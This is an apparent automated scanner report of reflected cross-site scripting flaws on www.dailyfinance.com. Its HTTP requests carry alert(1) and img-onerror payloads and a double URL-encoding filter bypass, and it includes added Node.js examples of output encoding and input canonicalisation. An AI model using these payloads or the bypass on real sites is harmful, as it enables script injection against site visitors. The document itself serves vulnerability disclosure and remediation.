User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.484. http://www.dailyfinance.com/wire/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /wire/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1765"-alert(1)-"31f006db44a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wire/?d1765"-alert(1)-"31f006db44a=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.485. http://www.dailyfinance.com/wire/ap/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /wire/ap/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d89b9"-alert(1)-"395f81e262d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wire/ap/?d89b9"-alert(1)-"395f81e262d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.486. http://www.dailyfinance.com/wire/page/2/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /wire/page/2/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 790a0"-alert(1)-"24789c2b648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wire/page/2/?790a0"-alert(1)-"24789c2b648=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5609d"><img%20src%3da%20onerror%3dalert(1)>06257ecfc9d was submitted in the REST URL parameter 2. This input was echoed as 5609d"><img src=a onerror=alert(1)>06257ecfc9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/abigail-field5609d"><img%20src%3da%20onerror%3dalert(1)>06257ecfc9d/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
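The two reflection contexts this report keeps finding, the name of an arbitrary query parameter copied into a double-quoted JavaScript string (issue 1.484 and the entries like it) and the /writers/ path segment copied into a double-quoted HTML attribute, rendered first the unsafe way and then with encoding chosen for the exact context each value lands in. This is an added example in Node.js, not the site's own templates, which the report does not show: the page shape, the variable name pageUrl and the two helper functions are assumptions made for illustration.

```javascript
// Added example, not code from www.dailyfinance.com. The template shape below
// (a URL assigned to a JavaScript string variable, an author name placed in an
// og:title attribute) is assumed for illustration; the scanned templates are
// not shown in the report.

// Encode for a double-quoted JavaScript string literal inside a <script> block.
// JSON.stringify handles quotes, backslashes and control characters; the extra
// replacements stop an attacker closing the <script> element with </script>
// and neutralise U+2028/U+2029, which are line terminators in JavaScript.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Encode for a double-quoted HTML attribute value (also safe for text nodes).
// Ampersand goes first so the entities added afterwards are not re-encoded.
function htmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Unsafe rendering: raw request data is concatenated into both contexts.
// The whole query string is untrusted, names as well as values, which is why
// the scanner can attack through an arbitrarily chosen parameter name.
function renderVulnerable(queryString, authorName) {
  return [
    '<meta property="og:title" content="' + authorName + '" />',
    '<script>var pageUrl="/writers/?' + queryString + '";</script>',
  ].join('\n');
}

// Hardened rendering: each value is encoded for the context it is written into.
function renderSafe(queryString, authorName) {
  return [
    '<meta property="og:title" content="' + htmlAttr(authorName) + '" />',
    '<script>var pageUrl=' + jsStringLiteral('/writers/?' + queryString) + ';</script>',
  ].join('\n');
}

// Constructed inputs modelled on the payloads in the report.
const PARAM_NAME_PAYLOAD = 'd1765"-alert(1)-"31f006db44a=1';
const AUTHOR_PAYLOAD = 'Annabelle Gurwitch3beb9"><img src=a onerror=alert(1)>66beaca10e2';

// Crude check used to compare the two renderings: the raw quote-closing
// sequences both payloads depend on must not survive in the output.
function containsLiveInjection(html) {
  return html.includes('"-alert(1)-"') || html.includes('"><img');
}
```

renderVulnerable reproduces both reflections verbatim; renderSafe leaves the parameter name and the author name visible to the page but inert. Encoding is the minimum; the remediation text above is right that the better fix for the script case is not to write request data into a script block at all (a data- attribute read by the script, or a JSON blob in a non-executable script element, removes the context entirely).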
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d7d%2522%253bf4f13e83af2 was submitted in the REST URL parameter 2. This input was echoed as a9d7d";f4f13e83af2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/abigail-fielda9d7d%2522%253bf4f13e83af2/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
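The double URL-decoding bypass described in the issue above, and the remediation the report gives for it, as an added example in Node.js; none of this is code from the site. The three-stage pipeline (one decode by the web server, a denylist filter, then a second decode by the application) and the denylist itself are assumptions that reproduce the reported behaviour: the payload a9d7d%2522%253bf4f13e83af2 gets past the filter and is echoed as a9d7d";f4f13e83af2. The fixed handler drops the second decode and runs validation after any canonicalisation, as the remediation detail recommends.

```javascript
// Added example, not code from www.dailyfinance.com. The pipeline and the
// denylist below are assumptions used to model the behaviour in the report.

const BLOCKED = /["'<>]/; // characters the application's filter rejects (assumed)

// Percent-decode once. Malformed sequences are reported as invalid input
// instead of throwing a URIError out of the handler.
function decodeOnce(value) {
  try {
    return decodeURIComponent(value);
  } catch (e) {
    return null;
  }
}

// The reported sink: the path segment ends up inside a double-quoted
// JavaScript string, so the reflection is modelled as that concatenation.
function emit(value) {
  return '<script>var author="' + value + '";</script>';
}

// Vulnerable flow. The web server has already decoded the path once; the
// application validates that value and then decodes it again, so the filter
// inspects %22 and %3b (harmless) while the page receives " and ;.
function vulnerableHandler(rawPathSegment) {
  const once = decodeOnce(rawPathSegment);
  if (once === null || BLOCKED.test(once)) return { blocked: true, output: null };
  const twice = decodeOnce(once); // the unnecessary second decode
  if (twice === null) return { blocked: true, output: null };
  return { blocked: false, output: emit(twice) };
}

// Fixed flow, per the remediation detail: no second decode, and whatever
// canonicalisation the application does insist on runs before validation,
// so the filter sees exactly the characters that will be echoed.
function fixedHandler(rawPathSegment, canonicalise = (v) => v) {
  const once = decodeOnce(rawPathSegment);
  if (once === null) return { blocked: true, output: null };
  const canonical = canonicalise(once);
  if (canonical === null || BLOCKED.test(canonical)) return { blocked: true, output: null };
  return { blocked: false, output: emit(canonical) };
}

// Inputs constructed from the report: the double-encoded payload, the same
// payload single-encoded, and a benign author slug.
const DOUBLE_ENCODED = 'abigail-fielda9d7d%2522%253bf4f13e83af2';
const SINGLE_ENCODED = 'abigail-fielda9d7d%22%3bf4f13e83af2';
const BENIGN = 'abigail-field';
```

vulnerableHandler(DOUBLE_ENCODED) returns a script containing a9d7d";f4f13e83af2, while the single-encoded form is blocked, which is exactly the asymmetry the scanner exploited. fixedHandler(DOUBLE_ENCODED) echoes the percent sequences literally, and fixedHandler(DOUBLE_ENCODED, decodeOnce) blocks, because the check now runs on the canonical value. The denylist is kept only to model the site's existing filter; output encoding for the JavaScript string context is still required, since a character filter is not a substitute for it.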
1.489. http://www.dailyfinance.com/writers/abigail-field/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/abigail-field/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6712c"-alert(1)-"1a706dc858a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/abigail-field/?6712c"-alert(1)-"1a706dc858a=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a62fa%2522%253b07c35429eb4 was submitted in the REST URL parameter 2. This input was echoed as a62fa";07c35429eb4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/annabelle-gurwitcha62fa%2522%253b07c35429eb4/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3beb9"><img%20src%3da%20onerror%3dalert(1)>66beaca10e2 was submitted in the REST URL parameter 2. This input was echoed as 3beb9"><img src=a onerror=alert(1)>66beaca10e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/annabelle-gurwitch3beb9"><img%20src%3da%20onerror%3dalert(1)>66beaca10e2/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<meta property="og:title" content="Annabelle Gurwitch3beb9"><img Src=a Onerror=alert(1)>66beaca10e2" /> ...[SNIP]...
1.492. http://www.dailyfinance.com/writers/annabelle-gurwitch/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/annabelle-gurwitch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6417"-alert(1)-"b509b513d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/annabelle-gurwitch/?f6417"-alert(1)-"b509b513d43=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18e1"><img%20src%3da%20onerror%3dalert(1)>0f23daf9f53 was submitted in the REST URL parameter 2. This input was echoed as a18e1"><img src=a onerror=alert(1)>0f23daf9f53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/bruce-watsona18e1"><img%20src%3da%20onerror%3dalert(1)>0f23daf9f53/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dfe1%2522%253b363edcc705b was submitted in the REST URL parameter 2. This input was echoed as 3dfe1";363edcc705b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/bruce-watson3dfe1%2522%253b363edcc705b/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.495. http://www.dailyfinance.com/writers/bruce-watson/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/bruce-watson/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0e22"-alert(1)-"858a68f9be2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/bruce-watson/?e0e22"-alert(1)-"858a68f9be2=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fe3e"><img%20src%3da%20onerror%3dalert(1)>8ba5f9eb009 was submitted in the REST URL parameter 2. This input was echoed as 6fe3e"><img src=a onerror=alert(1)>8ba5f9eb009 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/dawn-kawamoto6fe3e"><img%20src%3da%20onerror%3dalert(1)>8ba5f9eb009/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a650c%2522%253b7f03a103ab3 was submitted in the REST URL parameter 2. This input was echoed as a650c";7f03a103ab3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/dawn-kawamotoa650c%2522%253b7f03a103ab3/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.498. http://www.dailyfinance.com/writers/dawn-kawamoto/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/dawn-kawamoto/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cac23"-alert(1)-"933f44c6d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/dawn-kawamoto/?cac23"-alert(1)-"933f44c6d8d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52cd9%2522%253b4d5e9d4b641 was submitted in the REST URL parameter 2. This input was echoed as 52cd9";4d5e9d4b641 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/gene-marcial52cd9%2522%253b4d5e9d4b641/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ff73"><img%20src%3da%20onerror%3dalert(1)>401196f4fd2 was submitted in the REST URL parameter 2. This input was echoed as 7ff73"><img src=a onerror=alert(1)>401196f4fd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/gene-marcial7ff73"><img%20src%3da%20onerror%3dalert(1)>401196f4fd2/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
